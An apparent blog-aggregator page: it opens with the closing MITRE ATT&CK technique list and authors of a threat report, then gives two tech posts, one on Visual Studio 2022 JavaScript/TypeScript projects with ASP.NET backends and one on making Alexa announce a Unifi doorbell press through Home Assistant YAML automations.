    T1113 Screen Capture
    T1560.001 Archive Collected Data: Archive via Utility
    Command and Control
    T1105 Ingress Tool Transfer
    T1571 Non-Standard Port
    Exfiltration
    T1041 Exfiltration Over C2 Channel

    Authors:

    Sathwik Ram Prakki

    Kartikkumar Jivani



    Source link

  • JavaScript and TypeScript Projects with React, Angular, or Vue in Visual Studio 2022 with or without .NET

    JavaScript and TypeScript Projects with React, Angular, or Vue in Visual Studio 2022 with or without .NET



    I was reading Gabby’s blog post about the new TypeScript/JavaScript project experience in Visual Studio 2022. You should read the docs on JavaScript and TypeScript in Visual Studio 2022.

    If you’re used to ASP.NET apps, then when you think about apps that are JavaScript-heavy, “front end” focused, or TypeScript focused, it can be confusing to figure out “where does .NET fit in?”

    You need to consider the responsibilities of your various projects or subsystems and the multiple totally valid ways you can build a web site or web app. Let’s consider just a few:

    1. An ASP.NET Web app that renders HTML on the server but uses TS/JS
      • This may have a Web API, Razor Pages, with or without the MVC pattern.
      • You maybe have just added JavaScript via <script> tags
      • Maybe you added a script minimizer/minifier task
      • Can be confusing because it can feel like your app needs to ‘build both the client and the server’ from one project
    2. A mostly JavaScript/TypeScript frontend app where the HTML could be served from any web server (node, kestrel, static web apps, nginx, etc)
      • This app may use Vue or React or Angular but it’s not an “ASP.NET app”
      • It calls backend Web APIs that may be served by ASP.NET, Azure Functions, 3rd party REST APIs, or all of the above
      • This scenario has sometimes been confusing for ASP.NET developers who may get confused about responsibility. Who builds what, where do things end up, how do I build and deploy this?

    VS2022 brings JavaScript and TypeScript support into VS with a full JavaScript Language Service based on TS. It provides a TypeScript NuGet Package so you can build your whole app with MSBuild and VS will do the right thing.

    NEW: Starting in Visual Studio 2022, there is a new JavaScript/TypeScript project type (.esproj) that allows you to create standalone Angular, React, and Vue projects in Visual Studio.

    The .esproj concept is great for folks familiar with Visual Studio as we know that a Solution contains one or more Projects. Visual Studio manages files for a single application in a Project. The project includes source code, resources, and configuration files. In this case we can have a .csproj for a backend Web API and an .esproj that uses a client side template like Angular, React, or Vue.

    Thing is, historically, when Visual Studio supported Angular, React, or Vue, its templates were out of date and not updated often enough. VS2022 solves that problem by using the native CLIs for these front ends: Angular CLI, Create React App, and Vue CLI.

    If I am in VS and go “File New Project”, there are Standalone templates that solve Example 2 above. I’ll pick JavaScript React.

    Standalone JavaScript Templates in VS2022

    Then I’ll click “Add integration for Empty ASP.NET Web API”. This will give me a frontend with JavaScript ready to call an ASP.NET Web API backend. I’ll follow along here.

    Standalone JavaScript React Template

    It then uses the React CLI to make the front end, which again, is cool as it’s whatever version I want it to be.

    React Create CLI

    Then I’ll add my ASP.NET Web API backend to the same solution, so now I have an esproj and a csproj like this

    frontend and backend

    Now I have a nice clean two-project system – in this case more JavaScript focused than .NET focused. This one uses npm to start up the project with its web development server, and proxy middleware to proxy localhost:3000 calls over to the ASP.NET Web API project.

    Here is a React app served by npm calling over to the Weather service served from Kestrel on ASP.NET.

    npm app running in VS 2022 against an ASP.NET Web API

    This is inverted from what most ASP.NET folks are used to, and that’s OK. It shows me that Visual Studio 2022 can support either development style, use whatever CLI is installed for my frontend framework, and let me choose which web server and web browser (via Launch.json) I want.

    If you want to flip it, and put ASP.NET Core as the primary and then bring in some TypeScript/JavaScript, follow this tutorial because that’s also possible!


    Source link

  • Using Home Assistant to integrate a Unifi Protect G4 Doorbell and Amazon Alexa to announce visitors

    Using Home Assistant to integrate a Unifi Protect G4 Doorbell and Amazon Alexa to announce visitors



    I am not a Home Assistant expert, but it’s clearly a massive and powerful ecosystem. I’ve interviewed the creator of Home Assistant on my podcast and I encourage you to check out that chat.

    Home Assistant can quickly become a hobby that overwhelms you. Every object (entity) in your house that is even remotely connected can become programmable. Everything. Even people! You can declare that any name:value pair that (for example) your phone can expose can be consumable by Home Assistant. Questions like “is Scott home” or “what’s Scott’s phone battery” can be associated with Scott the Entity in the Home Assistant Dashboard.

    I was amazed at the devices/objects that Home Assistant discovered that it could automate. Lights, remotes, Spotify, and more. You’ll find that any internally connected device you have likely has an Integration available.

    Temperature, Light Status, sure, that’s easy Home Automation. But integrations and 3rd party code can give you details like “Is the Living Room dark” or “is there motion in the driveway.” From these building blocks, you can then build your own IFTTT (If This Then That) automations, combining not just two systems, but any and all disparate systems.

    What’s the best part? This all runs LOCALLY. Not in a cloud or the cloud or anyone’s cloud. I’ve got my stuff running on a Raspberry Pi 4. Even better, I put a Power over Ethernet (PoE) hat on my Pi, so a single network wire into my hub both connects and powers it.

    I believe setting up Home Assistant on a Pi is the best and easiest way to get started. That said, you can also run in a Docker Container, on a Synology or other NAS, or just on Windows or Mac in the background. It’s up to you. Optionally, you can pay Nabu Casa $5 for remote (outside your house) network access via transparent forwarding. But to be clear, it all still runs inside your house and not in the cloud.

    Basic Home Assistant Setup

    OK, to the main point. I used to have an Amazon Ring Doorbell that would integrate with Amazon Alexa, and when you pressed the doorbell it would say “Someone is at the front door” on all our Alexas. It was a lovely little integration that worked nicely in our lives.

    Front Door UniFi G4 Doorbell

    However, I swapped out the Ring for a Unifi Protect G4 Doorbell for a number of reasons. I don’t want to pump video to outside services, so this doorbell integrates nicely with my existing Unifi installation and records video to a local hard drive. But I lose the Alexa integration and that nice little “someone is at the door” announcement. So this seems like a perfect job for Home Assistant.

    Here’s the general todo list:

    • Install Home Assistant
    • Install Home Assistant Community Store
      • This enables 3rd party “untrusted” integrations directly from GitHub. You’ll need a GitHub account and it’ll clone custom integrations directly into your local HA.
      • I also recommend the Terminal & SSH (9.2.2) and File editor (5.3.3) add-ons so you can see what’s happening.
    • Get the UniFi Protect 3rd party integration for Home Assistant
      • NOTE: Unifi Protect support is being promoted in Home Assistant v2022.2 so you won’t need this step soon as it’ll be included.
      • “The UniFi Protect Integration adds support for retrieving Camera feeds and Sensor data from a UniFi Protect installation on either an Ubiquiti CloudKey+, Ubiquiti UniFi Dream Machine Pro or UniFi Protect Network Video Recorder.”
      • Authenticate and configure this integration.
    • Get the Alexa Media Player integration
      • This makes all your Alexas show up in Home Assistant as “media players” and also allows you to tts (text to speech) to them.
      • Authenticate and configure this integration.

    I recommend going into your Alexa app and making a Multi-room Speaker Group called “everywhere.” Not only because it’s nice to be able to say “play the music everywhere” but you can also target that “Everywhere” group in Home Assistant.

    Go into your Home Assistant UI at http://homeassistant.local:8123/ and into Developer Tools. Under Services, try pasting in this YAML and clicking “call service.”

    service: notify.alexa_media_everywhere
    data:
      message: Someone is at the front door, this is a test
      data:
        type: announce
        method: speak
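
    As a side note, the same test call can also be made from a script instead of the Developer Tools page, using Home Assistant’s REST API. Here is a minimal Python sketch, assuming you’ve generated a long-lived access token under your Home Assistant user profile and that the Alexa Media Player integration has created the notify.alexa_media_everywhere service for your “everywhere” speaker group:

    # Call the notify.alexa_media_everywhere service through the Home Assistant REST API.
    # Requires a long-lived access token created under your Home Assistant user profile.
    import requests

    HA_URL = "http://homeassistant.local:8123"
    TOKEN = "YOUR_LONG_LIVED_ACCESS_TOKEN"  # placeholder

    payload = {
        "message": "Someone is at the front door, this is a test",
        "data": {"type": "announce", "method": "speak"},
    }

    resp = requests.post(
        f"{HA_URL}/api/services/notify/alexa_media_everywhere",
        headers={"Authorization": f"Bearer {TOKEN}"},
        json=payload,
        timeout=10,
    )
    resp.raise_for_status()
    print("Announcement sent")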

    If that works, you know you can automate Alexa and make it say things. Now, go to Configuration, Automation, and Add a new Automation. Here’s mine. I used the UI to create it. Note that your Entity names may be different if you give your front doorbell camera a different name.

    Binary_sensor.front_door_doorbell

    Notice the format of Data: it’s name/value pairs within a single field’s value.

    Alexa Action

    …but it also exists in a file called Automations.yaml. Note that the “to: ‘on’” trigger is required or you’ll get double announcements, one for each state change in the doorbell.

    - id: '1640995128073'
      alias: G4 Doorbell Announcement with Alexa
      description: G4 Doorbell Announcement with Alexa
      trigger:
      - platform: state
        entity_id: binary_sensor.front_door_doorbell
        to: 'on'
      condition: []
      action:
      - service: notify.alexa_media_everywhere
        data:
          data:
            type: announce
            method: speak
          message: Someone is at the front door
      mode: single

    It works! There’s a ton of cool stuff I can automate now!


    Source link